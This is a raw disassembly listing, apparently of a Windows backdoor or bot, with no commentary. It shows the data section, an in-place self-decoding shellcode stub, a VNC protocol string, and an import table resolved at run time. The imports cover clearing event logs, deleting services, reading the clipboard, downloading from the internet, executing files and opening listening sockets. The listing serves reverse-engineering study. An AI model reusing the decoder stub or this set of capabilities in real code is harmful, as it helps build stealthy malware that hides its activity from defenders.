aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: sub_420BEE+CF�o
align 10h
aFb db 'f',7,0 ; DATA XREF: sub_421589+96�o
align 4
dword_4492B8 dd 129F74h, 0 dword_4492C0 dd 127D78h, 0
; =============== S U B R O U T I N E =======================================
sub_4492C8 proc near ; DATA XREF: sub_421589+C8�o
; FUNCTION CHUNK AT 004492CE SIZE 00000043 BYTES
pusha
jmp short loc_4492CE
sub_4492C8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4492CB proc near ; CODE XREF: sub_4492C8:loc_4492CE�p
pop ebx
push ebx
retn
sub_4492CB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492C8
loc_4492CE: ; CODE XREF: sub_4492C8+1�j
call sub_4492CB
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_4492DB: ; CODE XREF: sub_4492C8+3C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_4492DB
popa
loc_449307: ; DATA XREF: sub_421589+A7�r
add [ebx+31h], al
loc_44930A: ; DATA XREF: sub_421589+A1�r
mov ebp, 7FC77h
loc_44930F: ; DATA XREF: sub_421589:loc_42186F�r
; sub_421589+310�r ...
add [ecx], al
; END OF FUNCTION CHUNK FOR sub_4492C8
; ---------------------------------------------------------------------------
db 3 dup(0)
db 43h
; ---------------------------------------------------------------------------
loc_449315: ; CODE XREF: .text:00449317�j
xor eax, eax
ja short loc_449315
pop es
; ---------------------------------------------------------------------------
dw 0
dd 1, 77BB1F89h, 7FCh, 1, 77C01F89h, 7FCh, 1, 655B4F02h
dd 7E7h, 0
dword_449344 dd 158h dword_449348 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_421589+24C�o
dword_44935C dd 65706970h, 736B775Ch, 637673hdword_449368 dd 73255C5Ch, 5Ch ; sub_421589+1DE�o
off_449370 dd offset off_42F434 ; DATA XREF: .text:off_42FBF0�o
; .text:0042FC34�o ...
align 8
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
dword_449390 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_4493A0 dd offset off_42F434 ; DATA XREF: .text:off_42FCC8�o
; .text:0042FD04�o ...
align 8
a_?av_com_error db '.?AV_com_error@@',0
align 10h
aUs db 'u',0
align 4
aSs db 's',0
align 4
off_4493C8 dd offset sub_42346C ; DATA XREF: sub_4284AC�r
dd offset nullsub_2
dd offset nullsub_2
align 10h
dword_4493E0 dd 19930520h, 3 dup(0) ; sub_423A4E+2�o
dd offset sub_429B43
align 10h
off_449400 dd offset off_42F434 ; DATA XREF: .text:off_42FD40�o
; .text:0042FD7C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
dword_449420 dd 1B3Fh align 10h
off_449430 dd offset dword_631B00 ; DATA XREF: sub_4245EC�o
; sub_424780+55�o ...
dd 0
dd offset dword_631B00
dd 101h
dword_449440 dd 2 dup(0) dd 1000h, 0
dword_449450 dd 3 dup(0) ; sub_425014+50�o ...
dd 2, 1, 3 dup(0)
dword_449470 dd 3 dup(0) ; sub_425014+58�o ...
dd 2 dup(2), 7 dup(0)
dword_4494A0 dd 7Ch dup(0) dword_449690 dd 8 dup(0) ; sub_42488E+D�o
off_4496B0 dd offset sub_4284EA ; DATA XREF: sub_424780+69�o
; sub_424FCB+1C�r
dword_4496B4 dd 2 ; sub_42B69E+46�r ...
off_4496B8 dd offset aNull_0 ; DATA XREF: sub_42512C:loc_425490�r
; sub_42512C+457�r
; "(null)"
off_4496BC dd offset aNull ; DATA XREF: sub_42512C+259�r
; "(null)"
dword_4496C0 dd 0Ch ; sub_425936+28�r ...
dword_4496C4 dd 0D2D0920h, 5Dhdword_4496CC dd 5Dh dword_4496D0 dd 1 dword_4496D4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_449838 dd offset word_449842 ; DATA XREF: sub_4228B3:loc_4228E3�r
; sub_4228B3:loc_4229A0�r ...
dd offset word_449842
db 2 dup(0)
word_449842 dw 20h ; DATA XREF: sub_42D61D+18�r
; .text:off_449838�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_449A44 dd 1 ; sub_4228B3:loc_422988�r ...
byte_449A48 db 2Eh ; DATA XREF: sub_425A04:loc_425CF8�r
; sub_425A04+311�r ...
align 4
dd 1
dword_449A50 dd 0FFFFFFFFh, 0A00h, 7 dup(0) ; sub_426826:loc_4268AA�o
dd 10h
off_449A78 dd offset off_449A78 ; DATA XREF: sub_427D40+D�o
; sub_427D40+69�o ...
off_449A7C dd offset off_449A78 ; DATA XREF: sub_427D40:loc_427DC0�r
; sub_427D40+89�w ...
dd offset dword_449A90
dd offset dword_449A90
dword_449A88 dd 0FFFFFFFFh ; sub_427E84:loc_427ED1�w
dd 0FFFFFFFFh
dword_449A90 dd 0F0h, 0F1h, 800h dup(0) ; .text:00449A84�o
off_44BA98 dd offset off_449A78 ; DATA XREF: sub_427E84+15�r
; sub_427E84+20�w ...
dword_44BA9C dd 1E0h ; sub_423F63+A7�r ...
dword_44BAA0 dd 0 ; sub_428497+6�r
off_44BAA4 dd offset dword_631408 ; DATA XREF: sub_42840D+1F�r
dd 7 dup(0)
off_44BAC4 dd offset dword_631438 ; DATA XREF: sub_42840D+17�r
dd 3 dup(0)
off_44BAD4 dd offset dword_631450 ; DATA XREF: sub_42840D+F�r
dd 3 dup(0)
off_44BAE4 dd offset dword_631420 ; DATA XREF: sub_42840D+7�r
dd 7 dup(0)
dd 0AF2798h, 16h dup(0)
off_44BB60 dd offset sub_428E12 ; DATA XREF: sub_423484+F�w
; sub_42512C+3AA�r
off_44BB64 dd offset sub_428ABC ; DATA XREF: sub_423484+5�w
; sub_42512C+3E2�r
off_44BB68 dd offset sub_428B22 ; DATA XREF: sub_423484+14�w
; sub_425A04+430�r
off_44BB6C dd offset sub_428A62 ; DATA XREF: sub_423484+1E�w
; sub_42512C+3CB�r
off_44BB70 dd offset sub_428B0A ; DATA XREF: sub_423484+28�w
off_44BB74 dd offset sub_428E12 ; DATA XREF: sub_423484+32�w
off_44BB78 dd offset a_cmd ; DATA XREF: sub_428FED+109�o
; ".cmd"
dd offset a_bat ; ".bat"
dd offset a_exe ; ".exe"
off_44BB84 dd offset a_com ; DATA XREF: sub_428FED+E7�o
; ".com"
dd offset sub_429B43
align 10h
off_44BB90 dd offset sub_429A8C ; DATA XREF: sub_429AED+29�r
dd 2 dup(43h), 20h dup(0)
dd 43h, 20h dup(0)
dword_44BCA0 dd 14h off_44BCA4 dd offset aExp ; DATA XREF: sub_42A4F3:loc_42A510�r
; "exp"
dd 1Dh, 42F6ECh, 1Ah, 42F6E8h, 1Bh, 42F6E0h, 1Fh, 42F6D8h
dd 13h, 42F6D0h, 21h, 42F6C8h, 0Eh, 42F6C0h, 0Dh, 42F6B8h
dd 0Fh, 42F6B0h, 10h, 42F6A8h, 5, 42F6A0h, 1Eh, 42F69Ch
dd 12h, 42F698h, 20h, 42F694h, 0Ch, 42F68Ch, 0Bh, 42F684h
dd 15h, 42F67Ch, 1Ch, 42F674h, 19h, 42F66Ch, 11h, 42F664h
dd 18h, 42F65Ch, 16h, 42F654h, 17h, 42F64Ch, 22h, 42F648h
dd 23h, 42F644h, 24h, 42F640h
dbl_44BD78 dq 1.797693134862316e308 ; DATA XREF: sub_42A22C+B7�r
; sub_42A22C:loc_42A313�r ...
dd 0
dd 0FFF80000h
dbl_44BD88 dq 1.797693134862316e308 ; DATA XREF: sub_42A22C+92�r
; sub_42A22C:loc_42A2EB�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_44BDA0 dt 2.3562723457267347066e313 ; DATA XREF: sub_42A6DB+D�r
; sub_42A6DB+1F�r
align 4
tbyte_44BDAC dt 1.9149954921904370718e-1233 ; DATA XREF: sub_42A6DB+31�r
align 4
byte_44BDB8 db 1 ; DATA XREF: sub_42A95E+ED�r
db 2, 4, 8
align 10h
dword_44BDC0 dd 3A4h dword_44BDC4 dd 82798260h, 21h, 0dword_44BDD0 dd 0DFA6h align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_44BEB0 dd 0C0000005h, 0Bh, 0 ; sub_42A95E+45�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_44BF28 dd 3 ; sub_42B05D+86�r ...
dword_44BF2C dd 7 ; sub_42B05D+8C�r ...
dd 78h
dword_44BF34 dd 0Ah ; sub_42D97E+4�r
dword_44BF38 dd 2 ; sub_42B69E+28�r
off_44BF3C dd offset aR6002FloatingP ; DATA XREF: sub_42B69E+FC�r
; sub_42B69E+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 42F928h, 9, 42F8FCh, 0Ah, 42F8D8h, 10h, 42F8ACh
dd 11h, 42F87Ch, 12h, 42F858h, 13h, 42F82Ch, 18h, 42F7F4h
dd 19h, 42F7CCh, 1Ah, 42F794h, 1Bh, 42F75Ch, 1Ch, 42F734h
dd 78h, 42F724h, 79h, 42F714h, 7Ah, 42F704h, 0FCh, 438858h
dd 0FFh, 42F6F4h
dword_44BFC8 dd 2 dup(0) dword_44BFD0 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_44BFE8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 2, 3 dup(0)dword_44C010 dd 7080h ; sub_42D078+75�w ...
dword_44C014 dd 1 ; sub_42D078+A2�w ...
dword_44C018 dd 0FFFFF1F0h ; sub_42D078+AB�w ...
off_44C01C dd offset dword_545350 ; DATA XREF: .text:off_44C09C�o
dd 0Fh dup(0)
off_44C05C dd offset dword_544450 ; DATA XREF: .text:off_44C0A0�o
dd 0Fh dup(0)
off_44C09C dd offset off_44C01C ; DATA XREF: sub_42D078+D0�r
; sub_42D078+EF�r ...
off_44C0A0 dd offset off_44C05C ; DATA XREF: sub_42D078+109�r
; sub_42D078+130�r ...
align 8
dword_44C0A8 dd 0FFFFFFFFh ; sub_42D320+1E�r ...
dword_44C0AC dd 0 ; sub_42D4CC+BF�w
dword_44C0B0 dd 0 ; sub_42D4CC+E0�w
align 8
dword_44C0B8 dd 0FFFFFFFFh ; sub_42D320+26�r ...
dword_44C0BC dd 0 ; sub_42D4CC+EA�w ...
dword_44C0C0 dd 0 ; sub_42D4CC+23�r ...
dword_44C0C4 dd 0FFFFFFFFh dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_44C0F4 dd 16Dh ; sub_42D4CC+2E�r ...
dword_44C0F8 dd 0FFFFFFFFh dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch
dword_44C12C dd 2694h ; sub_429EE1+46�r
dd offset off_44C138
align 8
off_44C138 dd offset aSun ; DATA XREF: .text:0044C130�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset dword_42FB30+2Ch
dd offset dword_42FB30+28h
dd offset dword_42FB30+24h
dd offset dword_42FB30+20h
dd offset dword_42FB30+1Ch
dd offset dword_42FB30+18h
dd offset dword_42FB30+14h
dd offset dword_42FB30+10h
dd offset dword_42FB30+0Ch
dd offset dword_42FB30+8
dd offset dword_42FB30+4
dd offset dword_42FB30
dd offset off_42FB2C
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset dword_42FB30+18h
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset dword_42FA80+44h
dd offset dword_42FA80+40h
dd offset dword_42FA80+3Ch
dd offset dword_42FA80+34h
dd offset dword_42FA80+20h
dd offset dword_42FA80+18h
align 8
dword_44C1E8 dd 2Eh, 0 dd offset dword_44C1E8
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd offset dword_631754
dd 2 dup(7F7F7F7Fh), 44C1F0h, 3 dup(0)
dword_44C230 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_44C390 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_42EB32+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_44C4F0 dd 0 ; sub_40203F+9�w
dword_44C4F4 dd 0 ; sub_40203F+21�r
dword_44C4F8 dd 0 ; sub_40203F+27�r
align 10h
dword_44C500 dd 0 ; sub_40203F+83�r
dd 21h dup(0)
dword_44C588 dd 0 ; sub_4015FC+AE�w ...
dword_44C58C dd 0 ; sub_40178D+136�r ...
dd 382h dup(0)
dword_44D398 dd 6 dup(0) ; sub_40178D+15D�o ...
dword_44D3B0 dd 4 dup(0) dword_44D3C0 dd 0 dword_44D3C4 dd 41h dup(0) dword_44D4C8 dd 41h dup(0) dword_44D5CC dd 0 ; sub_401477+111�r
dword_44D5D0 dd 0 dword_44D5D4 dd 0 ; sub_401477+B5�r
dword_44D5D8 dd 20h dup(0) dword_44D658 dd 0 dword_44D65C dd 0 dword_44D660 dd 0 dword_44D664 dd 0 ; sub_401477:loc_4015A9�r
dword_44D668 dd 0 dword_44D66C dd 0 ; sub_402190+8F�r ...
dword_44D670 dd 4 dup(0) dword_44D680 dd 0 ; sub_402190+58�w ...
dword_44D684 dd 0 ; resolved to->NTDLL.RtlInitUnicodeString ; sub_401C4A+35�r ...
dword_44D688 dd 0 ; resolved to->NTDLL.ZwOpenSection ; sub_401D57+78�r ...
dword_44D68C dd 0 ; sub_401C4A+2D�r ...
dword_44D690 dd 0 ; sub_401E76�r ...
dword_44D694 dd 0 ; sub_401D57+95�r ...
dword_44D698 dd 2 dup(0) word_44D6A0 dw 0 ; DATA XREF: sub_402A06+13�o
; sub_41FE93+C2�o ...
align 4
byte_44D6A4 db 0 ; DATA XREF: sub_403B2C+41A�o
; sub_403B2C+494�o ...
align 4
byte_44D6A8 db 0 ; DATA XREF: sub_40323F+E�o
; sub_40323F+48�w ...
align 4
dd 31h dup(0)
dword_44D770 dd 0 ; sub_4033F0:loc_403588�w ...
dword_44D774 dd 0 ; sub_4033F0+3A�w ...
dd 0
dword_44D77C dd 0 ; sub_4035A8+3A�r
dd 7Fh dup(0)
dword_44D97C dd 0 ; sub_4035A8+54�w
dd 9B3h dup(0)
db 2 dup(0)
word_45004E dw 0 ; DATA XREF: .text:off_44736C�o
byte_450050 db 3 dup(0) ; DATA XREF: .text:004473B8�o
byte_450053 db 0 ; DATA XREF: .text:004473A8�o
dword_450054 dd 0F8Fh dup(0) dword_453E90 dd 0 ; sub_403B2C+1A1B�o
dword_453E94 dd 41h dup(0) ; sub_403A30+27�o ...
dword_453F98 dd 41h dup(0) dword_45409C dd 0 ; sub_403B2C+1A2D�r ...
dword_4540A0 dd 0 dword_4540A4 dd 0 ; sub_403B2C+1995�w ...
dword_4540A8 dd 21h dup(0) dword_45412C dd 0 dword_454130 dd 0 dword_454134 dd 0 ; sub_403B2C:loc_4055CD�r
dword_454138 dd 0 align 10h
dword_454140 dd 20h dup(0) ; sub_40B122+14�o
dword_4541C0 dd 0 ; resolved to->KERNEL32.Module32First ; sub_40BB43+62�w
dword_4541C4 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_40BB43+8A9�r ...
dword_4541C8 dd 0 ; sub_40BB43+A00�r
dword_4541CC dd 0 ; sub_40BB43+9D0�r ...
dword_4541D0 dd 0 ; sub_40BB43+9F8�r
dword_4541D4 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_40BB43+42F�r ...
dword_4541D8 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_418B58+132�r
dword_4541DC dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_40BB43+437�r ...
dword_4541E0 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_40BB43+45F�r
dword_4541E4 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_402E92+5E�r ...
dword_4541E8 dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_40BB43+DC�r
dword_4541EC dd 0 ; sub_40BB43+9C3�r ...
dword_4541F0 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_40BB43+44F�r ...
dword_4541F4 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_40BB43+8D5�r ...
dword_4541F8 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_40BB43+2BA�r ...
dword_4541FC dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_40BB43+8CD�r ...
dword_454200 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_40BB43+104�r
dword_454204 dd 0 ; resolved to->WININET.InternetReadFile ; sub_40BB43+8DD�r ...
dword_454208 dd 0 ; resolved to->ADVAPI32.LockServiceDatabase ; sub_40BB43+46F�r ...
dword_45420C dd 0 ; resolved to->ADVAPI32.RegEnumValueA ; sub_40BB43+2DA�r ...
dword_454210 dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_40BB43+6DB�r
dword_454214 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_40BB43+D4�r
dword_454218 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_40BB43+A4E�w ...
dword_45421C dd 0 ; resolved to->WININET.FtpGetFileAdword_454220 dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_40BB43+FC�r
dword_454224 dd 0 ; sub_40BB43+C2C�r ...
dword_454228 dd 0 ; resolved to->WS2_32.ntohl ; sub_40BB43+5F4�w
dword_45422C dd 0 ; sub_40BB43+9F0�r ...
dword_454230 dd 0 ; resolved to->WS2_32.ntohs ; sub_40BB43+75F�r ...
dword_454234 dd 0 dword_454238 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_40BB43+896�r ...
dword_45423C dd 0 ; resolved to->USER32.ExitWindowsExdword_454240 dd 0 ; sub_40BB43+9D8�r ...
dword_454244 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_40BB43+43F�r ...
dword_454248 dd 0 ; resolved to->ADVAPI32.OpenThreadToken ; sub_40BB43+31F�r ...
dword_45424C dd 0 ; resolved to->ADVAPI32.CloseEventLog ; sub_40BB43+4E8�w
dword_454250 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_40BB43+447�r ...
dword_454254 dd 0 ; resolved to->WS2_32.getpeernamedword_454258 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_40BB43+57F�w ...
dword_45425C dd 0 ; sub_40BB43+A08�r ...
dword_454260 dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_40BB43+2C2�r ...
dword_454264 dd 0 ; resolved to->ADVAPI32.RegEnumKeyExA ; sub_415EA7+87�r ...
dword_454268 dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_40BB43+E4�r
dword_45426C dd 0 ; resolved to->ADVAPI32.SetServiceStatus ; sub_41B226+14D�r ...
dword_454270 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_40BB43+BBB�r ...
dword_454274 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_40BB43+6BE�r ...
dword_454278 dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_40BB43+8B9�r ...
dword_45427C dd 0 ; resolved to->USER32.CloseWindow ; sub_40BB43+1AF�r
dword_454280 dd 0 ; sub_40BB43+9E0�r ...
dword_454284 dd 0 ; resolved to->ADVAPI32.QueryServiceLockStatusA ; sub_40BB43+477�r ...
dword_454288 dd 0 ; resolved to->ADVAPI32.OpenEventLogA ; sub_40BB43+4DB�w ...
dword_45428C dd 0 ; resolved to->ADVAPI32.RegDeleteKeyA ; sub_40BB43+2CA�r ...
dword_454290 dd 0 ; resolved to->ADVAPI32.ClearEventLogA ; sub_40BB43+4CE�w ...
dword_454294 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_40BB43+6F3�r
dword_454298 dd 0 ; resolved to->WININET.InternetOpenA ; sub_40BB43+89C�r
dword_45429C dd 0 ; resolved to->SHLWAPI.PathRemoveFileSpecA ; sub_40CDE2+312�r ...
dword_4542A0 dd 0 ; resolved to->USER32.IsWindow ; sub_40BB43+1CC�r ...
dword_4542A4 dd 0 ; resolved to->IPHLPAPI.GetNetworkParamsdword_4542A8 dd 0 ; resolved to->WS2_32.getsockname ; sub_403B2C+6ED9�r ...
dword_4542AC dd 0 ; resolved to->WS2_32.connect ; sub_4016B4+91�r ...
dword_4542B0 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_40BB43+6E7�r ...
dword_4542B4 dd 0 ; resolved to->ADVAPI32.RegQueryInfoKeyA ; sub_41A60E+7A�r
dword_4542B8 dd 0 ; sub_40BB43:loc_40C465�w ...
dword_4542BC dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_40BB43+2AA�r ...
dword_4542C0 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_40BB43+7C7�r ...
dword_4542C4 dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_40BB43+334�r ...
dword_4542C8 dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_40BB43+457�r ...
dword_4542CC dd 0 ; sub_418436+B5�r ...
dword_4542D0 dd 0 ; sub_40BB43+C39�r ...
dword_4542D4 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_40BB43+8B1�r ...
dword_4542D8 dd 0 ; resolved to->USER32.OpenClipboard ; sub_40BB43+1DC�r
dword_4542DC dd 0 ; resolved to->IPHLPAPI.GetIfTable ; sub_40BB43+ADF�r ...
dword_4542E0 dd 0 ; resolved to->WININET.InternetConnectA ; sub_40BB43+8C1�r ...
dword_4542E4 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_40BB43+77F�r
dword_4542E8 dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_40BB43+2D2�r ...
dword_4542EC dd 0 ; sub_416208+86�r
dword_4542F0 dd 0 ; resolved to->WSOCK32.setsockopt ; sub_40BB43+669�w ...
dword_4542F4 dd 0 ; resolved to->IPHLPAPI.GetTcpTable ; sub_40BB43+AEB�r
dword_4542F8 dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_40BB43+32C�r ...
dword_4542FC dd 0 ; resolved to->WS2_32.select ; sub_402190+120�r ...
dword_454300 dd 0 ; resolved to->USER32.GetClipboardData ; sub_40BB43+1E4�r
dword_454304 dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_40BB43+422�r ...
dword_454308 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_45430C dd 0 ; sub_40BB43+C41�r ...
dword_454310 dd 0 ; resolved to->WS2_32.ntohl ; sub_402F12+7�r ...
dword_454314 dd 0 ; resolved to->WS2_32.ntohs ; sub_4016B4+70�r ...
dword_454318 dd 0 ; resolved to->KERNEL32.Process32First ; sub_40BB43+CC�r
dword_45431C dd 0 ; resolved to->USER32.FindWindowA ; sub_40BB43+1C4�r ...
dword_454320 dd 0 dword_454324 dd 0 ; resolved to->WS2_32.gethostname ; sub_40BB43+7B7�r ...
dword_454328 dd 0 ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerA ; sub_40BB43+48F�r ...
dword_45432C dd 0 ; resolved to->ADVAPI32.UnlockServiceDatabase ; sub_40BB43+487�r ...
dword_454330 dd 0 ; resolved to->WSOCK32.recv ; sub_401160+19C�r ...
dword_454334 dd 0 ; sub_416C0B+65�r
dword_454338 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_40BB43+C4�r
dword_45433C dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_40BB43+2B2�r ...
dword_454340 dd 0 ; resolved to->WS2_32.listen ; sub_40BB43+64F�w ...
dword_454344 dd 0 ; resolved to->WS2_32.bind ; sub_40BB43+635�w ...
dword_454348 dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_40CDE2+122�r ...
dword_45434C dd 0 ; resolved to->WS2_32.inet_addr ; sub_40178D+2C�r ...
